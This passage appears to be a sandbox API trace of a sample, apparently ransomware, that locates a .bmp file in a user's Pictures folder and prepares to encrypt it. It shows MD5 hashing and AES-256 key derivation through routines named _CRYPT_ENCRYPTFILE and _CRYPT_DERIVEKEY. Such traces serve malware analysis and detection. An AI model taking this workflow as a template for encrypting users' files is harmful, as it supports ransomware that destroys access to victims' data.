HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LYh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Yh\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rcuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uM7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uLGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LGY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GY1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kXH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XH5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mCjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CjrE6.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.679] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.679] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0190.679] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0190.679] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0190.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0190.679] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0190.679] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0190.679] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0190.679] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0190.679] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.680] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcca756f0, ftCreationTime.dwHighDateTime=0x1d5e4b5, ftLastAccessTime.dwLowDateTime=0x4016bd20, ftLastAccessTime.dwHighDateTime=0x1d5dba0, ftLastWriteTime.dwLowDateTime=0x4016bd20, ftLastWriteTime.dwHighDateTime=0x1d5dba0, nFileSizeHigh=0x0, nFileSizeLow=0x1720a, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="rcuM7uLGY1kXH5mCjrE6.bmp", cAlternateFileName="RCUM7U~1.BMP")) returned 0x90af58 [0190.680] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0190.680] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.680] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0190.680] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.680] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.680] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0190.680] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.680] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0190.680] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.680] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.680] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0190.680] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0190.680] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0190.681] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.681] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.681] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.681] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0190.681] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.681] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0190.682] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.682] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.682] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0190.682] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0190.682] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0190.682] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.682] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.682] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.682] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0190.682] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0190.682] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0190.682] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.682] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.682] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.682] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.682] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0190.682] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.682] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.683] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0190.683] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.683] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.683] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0190.683] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.683] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.683] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0190.683] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0190.683] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0190.683] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.683] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.683] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.683] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.683] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0190.683] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0190.683] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0190.683] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.683] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0190.683] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.683] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.683] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.683] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.684] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0190.684] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.684] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.684] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.684] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0190.684] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.684] CryptHashData (hHash=0x90ae18, pbData=0x8df0a0, dwDataLen=0x19, dwFlags=0x1) returned 1 [0190.684] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.684] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.684] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.684] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.684] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0190.684] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0190.684] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0190.684] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.684] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0190.685] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.685] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.685] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.685] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.685] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.685] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.685] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0190.685] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.685] CryptDestroyHash (hHash=0x90ae18) returned 1 [0190.685] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.685] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 